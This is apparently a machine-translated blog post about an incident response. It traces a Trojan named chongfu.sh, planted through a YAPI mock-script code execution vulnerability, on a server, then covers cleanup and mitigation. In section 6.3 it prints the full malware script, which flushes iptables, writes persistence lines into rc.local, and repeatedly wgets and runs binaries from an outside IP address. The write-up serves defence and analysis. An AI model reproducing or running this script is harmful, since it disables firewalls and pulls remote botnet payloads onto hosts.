当前位置:网站首页>Yapi vulnerability hanging horse program chongfu.sh processing
Yapi vulnerability hanging horse program chongfu.sh processing
2022-07-28 06:47:00 【opreator.ke】
One .【 background 】 The server network is stuck , Frequent external contracting , Cause the server network to crash .
Two .【 screening 】
2.1 Log in to the exception server , adopt top No abnormal CPU Memory anomalies .
2.2 Check the network
netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}'
No abnormality found , It's all normal tcp Connection status .
2.3 tcpdump command Caught analysis
tcpdump -i enp3s0
14:53:48.496584 IP smtp-5.etopbags.info.dnp > 218.46046: Flags [R.], seq 0, ack 3002381902, win 0, length 0
14:53:48.496825 IP 218.46048 > smtp-5.etopbags.info.dnp: Flags [S], seq 361520383, win 29200, options [mss 1460,sackOK,TS val 2043795 ecr 0,nop,wscale 7], length 0
14:53:48.536622 IP smtp-5.etopbags.info.dnp > 218.46048: Flags [R.], seq 0, ack 361520384, win 0, length 0
14:53:48.536876 IP 218.46050 > smtp-5.etopbags.info.dnp: Flags [S], seq 914055455, win 29200, options [mss 1460,sackOK,TS val 2043836 ecr 0,nop,wscale 7], length 0
14:53:48.574447 IP smtp-5.etopbags.info.dnp > 218.46050: Flags [R.], seq 0, ack 914055456, win 0, length 0
14:53:48.574644 IP 218.46052 > smtp-5.etopbags.info.dnp: Flags [S], seq 908877290, win 29200, options [mss 1460,sackOK,TS val 2043873 ecr 0,nop,wscale 7], length 0
14:53:48.609252 IP smtp-5.etopbags.info.dnp > 218.46052: Flags [R.], seq 0, ack 908877291, win 0, length 0
14:53:48.609342 IP 218.46054 > smtp-5.etopbags.info.dnp: Flags [S], seq 3724761583, win 29200, options [mss 1460,sackOK,TS val 2043908 ecr 0,nop,wscale 7], length 0
14:53:48.646988 IP smtp-5.etopbags.info.dnp > 218.46054: Flags [R.], seq 0, ack 3724761584, win 0, length 0
14:53:48.647066 IP 218.46056 > smtp-5.etopbags.info.dnp: Flags [S], seq 1209043513, win 29200, options [mss 1460,sackOK,TS val 2043946 ecr 0,nop,wscale 7], length 0
14:53:48.681432 IP smtp-5.etopbags.info.dnp > 218.46056: Flags [R.], seq 0, ack 1209043514, win 0, length 0
14:53:48.681516 IP 218.46058 > smtp-5.etopbags.info.dnp: Flags [S], seq 1382946052, win 29200, options [mss 1460,sackOK,TS val 2043980 ecr 0,nop,wscale 7], length 0
14:53:48.722538 IP smtp-5.etopbags.info.dnp > 218.46058: Flags [R.], seq 0, ack 1382946053, win 0, length 0
14:53:48.722614 IP 218.46060 > smtp-5.etopbags.info.dnp: Flags [S], seq 572251828, win 29200, options [mss 1460,sackOK,TS val 2044021 ecr 0,nop,wscale 7], length 0
14:53:48.759004 IP smtp-5.etopbags.info.dnp > 218.46060: Flags [R.], seq 0, ack 572251829, win 0, length 0
14:53:48.759089 IP 218.46064 > smtp-5.etopbags.info.dnp: Flags [S], seq 3797818250, win 29200, options [mss 1460,sackOK,TS val 2044058 ecr 0,nop,wscale 7], length 0
Exception found , Always on the outside smtp-5.etopbags.info.dnp , Send message
2.4 Found through the packet capturing tool , Target port 20000 Has been receiving messages 
2.5
netstat -lan |grep 20000
Check the process of this listening port , Found to be yapi A program of is executing .
/root/my-yapi/20000 This process is executing
Enter this directory , Abnormal file found .
3、 ... and 【 Trojan cleaning 】
Refer to this cleanup document
https://zhuanlan.zhihu.com/p/90792899
3.1 The end of the process ps aux | grep “20000” | grep -v grep | awk ‘{print $2}‘| xargs kill -9
3.2 Clear auto start script vim /etc/rc.local Get rid of sh /etc/chongfu.sh &
3.3 eliminate Script rm -rf /etc/chongfu.sh /tem/chongfu.sh
3.4 Change login password passwd
3.5 restart . reboot
good heavens , Follow up finding , This trojan horse is particularly stubborn .
Used multiple system file names to disguise , At the same time, it is associated with multiple timed repeating scripts . After complete cleaning , Processed .
Four 【 Locating vulnerabilities 】
4.1 Why is it in yapi Trojan files are generated in the directory of ?
4.2 This server is an intranet server , The password and port have security policies .
4.3 Start locating the problem , land yapi Administrator account , Found a large number of abnormal registrant information .
Hurry up and land github Look at the 
Then I found
http://www.hackdig.com/07/hack-404188.htm
because YAPI Remote code execution 0day There is no patch for the vulnerability ,BillGates Botnets and Mirai The botnet Trojan horse family mainly uses the controlled host to DDoS attack 、 Leave the back door or carry out mining operations . Tencent security experts suggest YAPI The government and enterprise organizations of the interface management platform shall take the following measures to mitigate the vulnerability risk as soon as possible :
1. Deploy Tencent cloud firewall to intercept threats in real time ;
2. close YAPI User registration function , To block the attacker from registering ;
3. Delete malicious registered users , Prevent attackers from adding... Again mock Script ;
4. Delete malicious mock Script , Prevent from being triggered by access again ;
5. The server rolls back the snapshot , It can clear the backdoor of exploit implantation .
5、 ... and 【yapi Problem fix 】
5.1 Give priority to removing the Internet address .
5.2 according to github The advice of , The user registration is closed .
6、 ... and 【 Trojan program disk 】
6.1 The attacker first registers the function and first registers the account , You can customize your account only after you log in mock Script .
6.2 Through mock Malicious commands are embedded in the script , To be accessed by the user mock Command execution is triggered when the interface initiates a request .
Then the above scene appeared .
6.3 Trojan script
#!/bin/bash
#Welcome like-minded friends to come to exchange.
#We are a group of people who have a dream.
# qun:10776622
# 2016-06-14
iptables -F
/etc/init.d/iptables stop
chkconfig iptables off
echo "chmod +x /tmp/X64" >> /etc/rc.local
echo "/tmp/X64 SHX64" >> /etc/rc.local
echo "chmod +x /tmp/ShouHu" >> /etc/rc.local
echo "/tmp/ShouHu SHX64" >> /etc/rc.local
m=X64 SHX64
script=ShouHu SHX64
hfs_m=http://27.50.49.61:2131/X64
hfs_s=http://27.50.49.61:2131/ShouHu
rm -f /tmp/$m*
while true
do
ps aux | grep $m | grep -v grep
if [ $? -eq 0 ];then
sleep 10
else
ls -l /tmp/$m
if [ $? -eq 0 ];then
/tmp/$m
else
cd /tmp/;wget $hfs_m ; chmod a+x $m;/tmp/$m
fi
fi
ps aux | grep $script | grep -v grep
if [ $? -eq 0 ];then
sleep 10
else
ls -l /tmp/$script
if [ $? -eq 0 ];then
/tmp/$script
else
cd /tmp;wget $hfs_s ; chmod a+x $script;/tmp/$script
fi
fi
done
边栏推荐
- [pta-- use queues to solve the problem of monkeys choosing kings]
- Fermat's theorem
- elastic常用高频命令
- OJ 1507 删数问题
- Leetcode 刷题日记 剑指 Offer II 047. 二叉树剪枝
- Mysql-8.0.17-winx64 (additional Navicat) manual configuration version installation
- ZOJ Problem 1005 jugs
- Redis cache design and performance optimization
- Valgrind tool
- Current learning progress
猜你喜欢
Mongodb replica set and partitioned cluster
What is hash? (development of Quantitative Trading Robot System)
Leetcode brush question diary sword finger offer II 048. serialization and deserialization binary tree
mongoDB复制集及分片集群
RayMarching实现体积光渲染
![[哈希表基础知识]](/img/8f/54a4780a02f81e5de3d92c25248e1e.png)
[哈希表基础知识]
Everything you don't know about time complexity is here
Leetcode 刷题日记 剑指 Offer II 047. 二叉树剪枝
Development of Quantitative Trading Robot System
![[PTA----树的遍历]](/img/d8/260317b30d624f8e518f8758706ab9.png)
[PTA----树的遍历]
随机推荐
Leetcode 刷题日记 剑指 Offer II 048. 序列化与反序列化二叉树
OJ 1045 反转然后相加
图形管线基础(番外篇)
OJ 1507 删数问题
Fermat's theorem
Two dimensional array practice: spiral matrix
Using C language to realize three piece chess games
[PTA----树的遍历]
[dynamic planning -- the best period for buying and selling stocks Series 2]
水渲染示例
[C note] data type and storage
OJ 1284 counting problem
AQS之countDownLatch源码分析
explain详解
【二叉树基础知识】
2022-07-17 Damon database installation
Array solution script
Problem solving for ACM freshmen in Jiangzhong on October 26
OJ 1505 保险丝
网络通信及TCP/IP协议